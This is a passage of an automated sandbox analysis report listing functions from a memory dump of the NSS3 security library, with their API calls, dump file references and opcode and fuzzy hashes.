                                                                                                                                                                                                                                                        • Part of subcall function 6C4906A0: PR_Unlock.NSS3 ref: 6C4906EB
                                                                                                                                                                                                                                                      • CERT_NewCertList.NSS3 ref: 6C47DFBF
                                                                                                                                                                                                                                                      • CERT_AddCertToListTail.NSS3(00000000,?), ref: 6C47DFDB
                                                                                                                                                                                                                                                      • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C47DFFA
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C47E029
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Cert$List$CriticalEnterErrorFindIssuerSectionTailUnlockValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3183882470-0
                                                                                                                                                                                                                                                      • Opcode ID: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
                                                                                                                                                                                                                                                      • Instruction ID: 319c20012f514cd7c23b4c5897563a13c38005994edc70fcdf8442d868a3d9cb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D110C71A04265AFDB30DEB95C88FEF7678AB8035DF040638E91887B01E736D81596F1
                                                                                                                                                                                                                                                      Function 6C498DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 284873373-0
                                                                                                                                                                                                                                                      • Opcode ID: 8fdcb042ca7fb036501548219a7c619bccd2f4dbfb66e4421845949d360cc1da
                                                                                                                                                                                                                                                      • Instruction ID: 309150fa1b146b8eeaf236e39f514e33369126adde77b58c847618ee8ad5478e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fdcb042ca7fb036501548219a7c619bccd2f4dbfb66e4421845949d360cc1da
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9114F75A05A109BDB00AF78D848A6ABBF4FF45714F024969DC88DBB00E730E894CBD5
                                                                                                                                                                                                                                                      Function 6C51AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C505F17,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C51AC94
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C505F17,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C51ACA6
                                                                                                                                                                                                                                                      • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C51ACC0
                                                                                                                                                                                                                                                      • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C51ACDB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3989322779-0
                                                                                                                                                                                                                                                      • Opcode ID: 886c5378e4aa5a089ec91b951c1f4344bdedcc92562c247964bab445427e38e9
                                                                                                                                                                                                                                                      • Instruction ID: 37b0786d2b99cb777a9f7974d010ef11f5e1495eacdcdca06f6d4a54b81b65c2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 886c5378e4aa5a089ec91b951c1f4344bdedcc92562c247964bab445427e38e9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 350129B1601B029BEB51DF2ADD08A57B7E8BF10699B104839E85AD7E00E731F159CBD1
                                                                                                                                                                                                                                                      Function 6C481DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(?), ref: 6C481DFB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4795B0: TlsGetValue.KERNEL32(00000000,?,6C4900D2,00000000), ref: 6C4795D2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4795B0: EnterCriticalSection.KERNEL32(?,?,?,6C4900D2,00000000), ref: 6C4795E7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4795B0: PR_Unlock.NSS3(?,?,?,?,6C4900D2,00000000), ref: 6C479605
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6C481E09
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                                                        • Part of subcall function 6C47E190: PR_EnterMonitor.NSS3(?,?,6C47E175), ref: 6C47E19C
                                                                                                                                                                                                                                                        • Part of subcall function 6C47E190: PR_EnterMonitor.NSS3(6C47E175), ref: 6C47E1AA
                                                                                                                                                                                                                                                        • Part of subcall function 6C47E190: PR_ExitMonitor.NSS3 ref: 6C47E208
                                                                                                                                                                                                                                                        • Part of subcall function 6C47E190: PL_HashTableRemove.NSS3(?), ref: 6C47E219
                                                                                                                                                                                                                                                        • Part of subcall function 6C47E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C47E231
                                                                                                                                                                                                                                                        • Part of subcall function 6C47E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C47E249
                                                                                                                                                                                                                                                        • Part of subcall function 6C47E190: PR_ExitMonitor.NSS3 ref: 6C47E257
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C481E37
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6C481E4A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 499896158-0
                                                                                                                                                                                                                                                      • Opcode ID: 0b875d0f7ad5c6b5e71ec85cedad180ae2591dc886f583af286206e8fd6451bb
                                                                                                                                                                                                                                                      • Instruction ID: a7a339a4fe273742be84fc699e15f25661cc4023b086f69c5b76d7eba986049f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b875d0f7ad5c6b5e71ec85cedad180ae2591dc886f583af286206e8fd6451bb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D01D471B01250D7EB10CA29EC40FA67764AB8174DF110137E93997B51E731E814CBE5
                                                                                                                                                                                                                                                      Function 6C481D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C481D75
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C481D89
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000010), ref: 6C481D9C
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C481DB8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Alloc_Util$Errorfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 939066016-0
                                                                                                                                                                                                                                                      • Opcode ID: c962cf9e4db3d344d956f4efd2456a7df7017447a54bade2f3767e013d253615
                                                                                                                                                                                                                                                      • Instruction ID: d96e6a444756003a2ceeb5a335778b600e4efa1f962c050b786dbbdd3f522cc3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c962cf9e4db3d344d956f4efd2456a7df7017447a54bade2f3767e013d253615
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61F0F9B260321057FF10DF199C41F877698DB81799F11063BDD299BF41D761F80582E1
                                                                                                                                                                                                                                                      Function 6C500840 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2F88,6C500660,00000020,00000000,?,?,6C502C3D,?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C500860
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000020,00000000,?,?,6C502C3D,?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C500874
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000001), ref: 6C500884
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C5008A3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterSectionUnlockValue$CallOnce
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2502187247-0
                                                                                                                                                                                                                                                      • Opcode ID: e1e459967a62f6fb86ac04ecd43c5b19dee775e323f5d6518604d5fe486be404
                                                                                                                                                                                                                                                      • Instruction ID: fb1afb20aee20782f39640c4915f9dbffe3bd620b3dac81fd70977822274f37a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1e459967a62f6fb86ac04ecd43c5b19dee775e323f5d6518604d5fe486be404
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD012075F00345ABEB012F25DC459557734FF9731DF0A0566EC0895E01EB21A85487DA
                                                                                                                                                                                                                                                      Function 6C4CFD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C479003,?), ref: 6C4CFD91
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(A4686C4D,?), ref: 6C4CFDA2
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,12D068C3,A4686C4D,?,?), ref: 6C4CFDC4
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?), ref: 6C4CFDD1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Alloc_Util$Valuefreemallocmemcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2335489644-0
                                                                                                                                                                                                                                                      • Opcode ID: f8ddf9dadac80ee83b5128f8e6a580f02effb0565d2670c52ad726afbddddc2b
                                                                                                                                                                                                                                                      • Instruction ID: b159cc6bc64904850b851daaf08d87b681b4f4f20b6774381fdacfa487cc01e2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8ddf9dadac80ee83b5128f8e6a580f02effb0565d2670c52ad726afbddddc2b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75F0C8B97022029BFB049B55DC90D177B68EF84799B148074ED0A8BB11E721E815C7F2
                                                                                                                                                                                                                                                      Function 6C58CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2988086103-0
                                                                                                                                                                                                                                                      • Opcode ID: 2e6c1cbef8b8112a5bb759d67e403d0bbbd943e86aa7072167d3ee6a644ceaf6
                                                                                                                                                                                                                                                      • Instruction ID: fa08770f15aa3320f578dab9c4c8310cdd2965014aaa963566d5d1bec089dd16
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e6c1cbef8b8112a5bb759d67e403d0bbbd943e86aa7072167d3ee6a644ceaf6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89E06576700A089FCA10EFA9DC48C8B77BCEE492743160529E691C7700D332F905CBE5
                                                                                                                                                                                                                                                      Function 6C469DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_value_text.NSS3 ref: 6C469E1F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4213C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C3F2352,?,00000000,?,?), ref: 6C421413
                                                                                                                                                                                                                                                        • Part of subcall function 6C4213C0: memcpy.VCRUNTIME140(00000000,R#?l,00000002,?,?,?,?,6C3F2352,?,00000000,?,?), ref: 6C4214C0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • LIKE or GLOB pattern too complex, xrefs: 6C46A006
                                                                                                                                                                                                                                                      • ESCAPE expression must be a single character, xrefs: 6C469F78
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcpysqlite3_value_textstrlen
                                                                                                                                                                                                                                                      • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                                                                                                                                                                      • API String ID: 2453365862-264706735
                                                                                                                                                                                                                                                      • Opcode ID: 9b84b059de969d1bc32182b0c18308f8d073173ec133eb5c1b2aac694563f089
                                                                                                                                                                                                                                                      • Instruction ID: 7d19a83c14f88cd0d4b50a8bbde62d55eecf76556bdb4b22734f570e9796106a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b84b059de969d1bc32182b0c18308f8d073173ec133eb5c1b2aac694563f089
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C811970A046518BD704CF26C480FA9B7F2AF95319F198659D8A48BFC9D773D847C790
                                                                                                                                                                                                                                                      Function 6C4E5860 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFD037,00000000), ref: 6C4E59C8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4E7EE0: PR_SetError.NSS3(00000000,00000000,00000002,?,?), ref: 6C4E7F30
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFD0AE,00000000), ref: 6C4E59E9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4EAA40: PR_SetError.NSS3(00000000,00000000,00000008,?,?), ref: 6C4EAAA2
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Error
                                                                                                                                                                                                                                                      • String ID: nXl
                                                                                                                                                                                                                                                      • API String ID: 2619118453-2538165799
                                                                                                                                                                                                                                                      • Opcode ID: e1bd1071422012d81e6f4f6615cbe8badc6a25988ed1359614f1323c998b4022
                                                                                                                                                                                                                                                      • Instruction ID: a36d0762691404302dfa3af20d4dab6dea458ec58737c445554d8883df001155
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1bd1071422012d81e6f4f6615cbe8badc6a25988ed1359614f1323c998b4022
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD41A4716083019FD710DF14DC85F9B73A8AB4832AF564629FD599B782E770E908CBE1
                                                                                                                                                                                                                                                      Function 6C4C4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C4C4D57
                                                                                                                                                                                                                                                      • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C4C4DE6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
